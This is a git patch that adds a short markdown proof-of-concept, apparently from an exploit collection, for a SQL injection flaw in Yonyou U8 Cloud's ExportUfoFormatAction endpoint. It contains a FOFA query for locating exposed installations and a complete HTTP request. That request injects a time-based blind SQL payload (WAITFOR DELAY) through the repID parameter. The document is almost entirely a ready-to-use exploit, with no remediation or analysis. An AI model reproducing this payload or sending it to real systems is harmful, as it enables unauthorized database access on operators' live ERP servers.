From a60fe5bafa49a5df1badb7e5100be1fa5d2575ed Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sun, 7 Apr 2024 18:46:48 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8BU8cloud-ExportUfoFor?= =?UTF-8?q?matAction=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...8cloud-ExportUfoFormatAction存在SQL注入漏洞.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞.md diff --git a/用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞.md b/用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞.md new file mode 100644 index 0000000..97c6e5f --- /dev/null +++ b/用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞.md @@ -0,0 +1,17 @@ +## 用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞 + +## fofa +``` +app="用友-U8-Cloud" +``` + +## poc +``` +GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.ExportUfoFormatAction&method=&repID=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1 +Host: url +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Type: application/json +Accept-Encoding: gzip +Connection: close + +```